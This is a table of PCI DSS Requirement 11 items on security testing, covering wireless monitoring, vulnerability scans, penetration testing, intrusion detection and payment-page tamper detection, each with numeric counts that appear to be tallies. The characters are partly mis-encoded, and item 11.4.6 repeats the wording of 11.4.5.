| ๐ผ 11.1 Processes and mechanisms for regularly testing security of systems and networks are defined and understood. | 2 | | | |
| ย ย ย ย ๐ผ 11.1.1 All security policies and operational procedures identified in Requirement 11 are documented, kept up to date, in use, and known to all affected parties. | | | | |
| ย ย ย ย ๐ผ 11.1.2 Roles and responsibilities for performing activities in Requirement 11 are documented, assigned, and understood. | | | | |
| ๐ผ 11.2 Wireless access points are identified and monitored, and unauthorized wireless access points are addressed. | 2 | | | |
| ย ย ย ย ๐ผ 11.2.1 Authorized and unauthorized wireless access points are managed. | | | | |
| ย ย ย ย ๐ผ 11.2.2 An inventory of authorized wireless access points is maintained, including a documented business justification. | | | | |
| ๐ผ 11.3 External and internal vulnerabilities are regularly identified, prioritized, and addressed. | 2 | | | |
| ย ย ย ย ๐ผ 11.3.1 Internal vulnerability scans are performed. | 3 | | | |
| ย ย ย ย ย ย ย ย ๐ผ 11.3.1.1 All other applicable vulnerabilities (those not ranked as high-risk or critical) are managed. | | | | |
| ย ย ย ย ย ย ย ย ๐ผ 11.3.1.2 Internal vulnerability scans are performed via authenticated scanning. | | | | |
| ย ย ย ย ย ย ย ย ๐ผ 11.3.1.3 Internal vulnerability scans are performed after any significant change. | | | | |
| ย ย ย ย ๐ผ 11.3.2 External vulnerability scans are performed. | 1 | | | |
| ย ย ย ย ย ย ย ย ๐ผ 11.3.2.1 External vulnerability scans are performed after any significant change. | | | | |
| ๐ผ 11.4 External and internal penetration testing is regularly performed, and exploitable vulnerabilities and security weaknesses are corrected. | 7 | | | |
| ย ย ย ย ๐ผ 11.4.1 A penetration testing methodology is defined, documented, and implemented by the entity. | | | | |
| ย ย ย ย ๐ผ 11.4.2 Internal penetration testing is performed. | | | | |
| ย ย ย ย ๐ผ 11.4.3 External penetration testing is performed. | | | | |
| ย ย ย ย ๐ผ 11.4.4 Exploitable vulnerabilities and security weaknesses found during penetration testing are corrected. | | | | |
| ย ย ย ย ๐ผ 11.4.5 If segmentation is used to isolate the CDE from other networks, penetration tests are performed on segmentation controls. | | | | |
| ย ย ย ย ๐ผ 11.4.6 If segmentation is used to isolate the CDE from other networks, penetration tests are performed on segmentation controls. | | | | |
| ย ย ย ย ๐ผ 11.4.7 Multi-tenant service providers support their customers for external penetration testing per Requirement 11.4.3 and 11.4.4. | | | | |
| ๐ผ 11.5 Network intrusions and unexpected file changes are detected and responded to. | 2 | | | |
| ย ย ย ย ๐ผ 11.5.1 Intrusion-detection and/or intrusion-prevention techniques are used to detect and/or prevent intrusions into the network. | 1 | | 1 | |
| ย ย ย ย ย ย ย ย ๐ผ 11.5.1.1 Intrusion-detection and/or intrusion-prevention techniques detect, alert on/prevent, and address covert malware communication channels. | | | 1 | |
| ย ย ย ย ๐ผ 11.5.2 A change-detection mechanism (for example, file integrity monitoring tools) is deployed. | | | 1 | |
| ๐ผ 11.6 Unauthorized changes on payment pages are detected and responded to. | 1 | | | |
| ย ย ย ย ๐ผ 11.6.1 A change- and tamper-detection mechanism is deployed. | | | 1 | |